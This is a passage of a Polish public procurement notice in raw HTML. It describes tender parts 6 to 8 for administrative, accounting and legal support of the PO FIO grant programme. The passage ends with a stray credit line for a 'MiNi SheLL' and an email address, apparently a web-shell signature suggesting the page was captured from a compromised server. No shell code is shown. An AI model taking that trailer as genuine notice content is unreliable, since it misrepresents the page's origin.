Wsparcie procesu rozliczania dotacji celowych i weryfikacji sprawozdań z realizacji zadań dofinansowanych z PO FIO:
1.	Sprawdzenie i akceptacja ocenionych sprawozdań z wykorzystaniem środków udzielonych w ramach PO FIO, zgodnie z metodologią rozliczania dotacji w ramach PO FIO oraz  zgodnie z przepisami prawa, w szczególności z ustawą o finansach publicznych, ustawą o działalności pożytku publicznego i o wolontariacie, Programem Operacyjnym FIO 2009-2013, Zasadami przyznawania i rozliczania dotacji w ramach PO FIO w roku 2011-2013 oraz w oparciu o analizy sprawozdań sporządzone przez ekspertów.
2.	Przygotowanie analizy sprawozdania  dla beneficjentów zgodnie z metodologią rozliczania dotacji w ramach PO FIO.
3.	Weryfikację przesłanej dokumentacji przez beneficjentów rozliczających dotację w ramach PO FIO.
4.	Monitorowanie terminowości odpowiedzi na przesłane do beneficjentów analizy sprawozdań zawierające konieczność przesłania dodatkowych wyjaśnień/uzupełnień. 
5.	Prowadzenie rejestrów rozliczonych umów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 75.10.00.00-7, 75.13.11.00-4, 75.13.10.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Usługa polegająca na obsłudze administracyjno - logistycznej oraz wsparciu obsługi konkursu i rozliczenia dotacji PO FIO..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres zamówienia: 
Obsługa administracyjno - logistyczna Programu Operacyjnego Fundusz Inicjatyw Obywatelskich (60 % czasu wykonywania zadań zleconych):
1.	Opracowywanie zapytań ofertowych w zakresie usług i materiałów niezbędnych do zakupu na potrzeby Sekcji FIO
2.	Opracowanie i przygotowanie dokumentacji niezbędnej do realizacji zakupu usług i materiałów na potrzeby Sekcji FIO
3.	Prowadzenie wykazu  i rejestru spraw prowadzonych przez Sekcję FIO,
4.	Porządkowanie i opisanie przechowywanych przez Sekcję FIO dokumentów
5.	Zapewnienie właściwego obiegu dokumentów zgodnie z Regulaminem Organizacyjnym CRZL .
6.	Ewidencja i archiwizacja  dokumentów będących w posiadaniu Sekcji FIO, w tym przygotowanie do przekazania Instytucji Zarządzającej, złożonych i niedofinasowanych ofert, kart ocen , sprawozdań i umów wraz z załącznikami oraz sprawozdań w ramach PO FIO  2010 , PO FIO 2011, PO FIO 2012 oraz PO FIO 2013.
7.	Obsługa organizacyjna i udział Wykonawcy w konferencjach - spotkaniach informacyjnych organizowanych w ramach PO FIO, zgodnie z Planem Informacji i Promocji na rok 2013

Obsługa konkursu (30 % czasu wykonywanych zadań zleconych):
1.	Obsługa infolinii dla oferentów w ogłoszonych konkursach.
2.	Nadzór nad rejestracją wniosków w generatorze on-line.
3.	Odbieranie wniosków nadesłanych pocztą/kurierem/złożonych bezpośrednio w siedzibie CRZL.
4.	Nadanie numeru identyfikacyjnego (numer FIO) i rejestracja ofert w wersji papierowej zgodnie z nadanym automatycznie numerem przez generator wniosków.
5.	Odebranie kart ocen w wersji elektronicznej w generatorze ofert oraz weryfikacja kart ocen złożonych przez ePUAP, które zostaną przekazane przez DPP na elektronicznym nośniku danych.
6.	Weryfikacja ocen ekspertów, danych złożonych przez oferentów oraz innych informacji zapisanych Generatorze. Weryfikowanie ocen ekspertów w kwestii kryteriów formalnych oraz nanoszenie poprawek na pisemną lub mailową prośbę organizacji.
7.	Poinformowanie pocztą elektroniczną wnioskodawców, którym Minister przyznał dofinansowanie (zgodnie z ogłoszonymi wynikami konkursu), o przyznaniu dotacji i ewentualnej konieczności modyfikacji harmonogramu lub kosztorysu.
8.	przeprowadzenia wizyt monitorujących stan realizacji projektów dofinansowanych w ramach PO FIO 2012 i PO FIO 2013 na podstawie listy organizacji wytypowanych przez Instytucję Zarządzającą .

Rozliczenie dotacji (10% czasu wykonywanych zadań zleconych):
1.	Weryfikację przesłanej dokumentacji przez beneficjentów rozliczających dotację w ramach PO FIO.
2.	Monitorowanie terminowości odpowiedzi na przesłane do beneficjentów analizy sprawozdań zawierające konieczność przesłania dodatkowych wyjaśnień/uzupełnień. 
3.	Opracowywanie odwołań wraz z rekomendacją CRZL-u w przypadkach rozliczania dotacji wymagających stanowiska Instytucji Zarządzającej.
4.	Prowadzenie rejestrów rozliczonych umów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 75.10.00.00-7, 75.13.11.00-4, 75.13.10.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Usługa polegająca na obsłudze  finansowo - księgowej Programu Operacyjnego Fundusz Inicjatyw.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres zamówienia: 
1.	Wprowadzania dokumentów do ewidencji księgowej.
2.	Współpraca w przygotowywaniu załączników dot. zaangażowania środków zawartych umów cywilnoprawnych.
3.	Prowadzenie ewidencji pozabilansowej.
4.	Uzgodnienie zapisów księgowych.
5.	Przygotowywanie sprawozdań RB-28, RB-23,RB-27,RB-N,RB-Z.
6.	Przygotowywanie umów cywilno - prawnych 
7.	Prowadzenie rejestru zawartych umów cywilno - prawnych 
8.	Weryfikacja dokumentów niezbędnych do wprowadzenie do systemu QNT.
9.	Sporządzanie miesięcznego zestawienia wprowadzonych do systemu QNT umów.
10.	Przyjmowanie rachunków.
11.	Sporządzanie list płac.
12.	Dokonywanie rozliczeń z Urzędem Skarbowym. 
13.	Dokonywanie rozliczeń z ZUS-em (sporządzanie i przekazywanie deklaracji rozliczeniowych.
14.	Obsługa budżetowa PO FIO.
15.	Rejestracja zapotrzebować z PO FIO i angażowanie środków.
16.	Przygotowywanie dokumentów dotyczących zmian paragrafów środków przekazanych na realizację obsługi PO FIO przez CRZL z rezerw celowych budżetu państwa.
17.	Weryfikacja i uzgodnienia paragrafów budżetowych na zapotrzebowaniach składanych przez Sekcję FIO.
18.	Sporządzania zapotrzebowań na środki finansowe do MPiPS, MF.
19.	Wyjaśniania nieprawidłowości związanych z dokumentami księgowymi z kontrahentami..
20.	Parafowania dokumentów pod względem formalno - rachunkowym.
21.	Dokonywania przelewów na podstawie dokumentów zatwierdzonych pod względem merytorycznym i finansowo - księgowym.
22.	Przygotowywania dokumentacji związanej z płatnościami i przekazywanie do Wydziału Księgowości..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 75.10.00.00-7, 75.13.11.00-4, 75.13.10.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Usługa polegająca na obsłudze prawnej procesu wdrażania Programu Operacyjnego Fundusz Inicjatyw Obywatelskich w Centrum Rozwoju Zasobów Ludzkich..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres zamówienia: 
Obsługa prawna procesu wdrażania Programu Operacyjnego Fundusz Inicjatyw Obywatelskich w Centrum Rozwoju Zasobów Ludzkich w roku 2012 poprzez:
1.	Sporządzanie projektów umów,
2.	Opiniowanie projektów umów, 
3.	Opiniowanie dokumentacji merytorycznej, 
4.	Sporządzanie opinii w zakresie wdrażania PO FIO w CRZL
5.	Konsultacje prawne..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.10.00.00-5, 75.10.00.00-7, 75.13.11.00-4, 75.13.10.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com